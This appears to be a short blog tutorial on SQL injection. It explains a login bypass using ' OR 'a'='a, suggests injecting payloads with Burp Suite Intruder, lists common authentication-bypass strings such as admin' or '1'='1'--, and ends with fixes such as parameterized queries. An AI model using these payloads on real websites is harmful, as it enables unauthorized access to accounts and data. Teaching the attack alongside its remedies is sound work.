Nowadays SQL injection is a common attack that use malicious SQL injection code for database manipulation to access information.
OR
When exploiting SQL injection, the web application display error message from the database. Database complaining that the query syntax is incorrect.
OR
Gain the unauthorized access to the website through the SQL Injection and take the information.
How to exploit:-
EX
Take a simple username (admin) and password we choose
‘ OR ‘a’=’a
From users WHERE user=’admin’ AND password=’ ‘ OR ’a’=’a’
‘a’ = ‘a is a true value
Let's analyze
Username=’admin’ AND Password=’’ OR ‘a’=’a’
Means username password true
Use Burp suite tool and inject the customize attack through Intruder
Here we introduce some SQL attack.
or 1=1
or 1=1--
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'# ………….etc
or 1=1--
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'# ………….etc
How to Fix:-
1. Use stored procedure
2. Use parameterize query
3. Limit database permission and privilege
4. Avoid display database error directly to the user
5. Use the regular expression to identify the text block and sql statements
No comments:
Post a Comment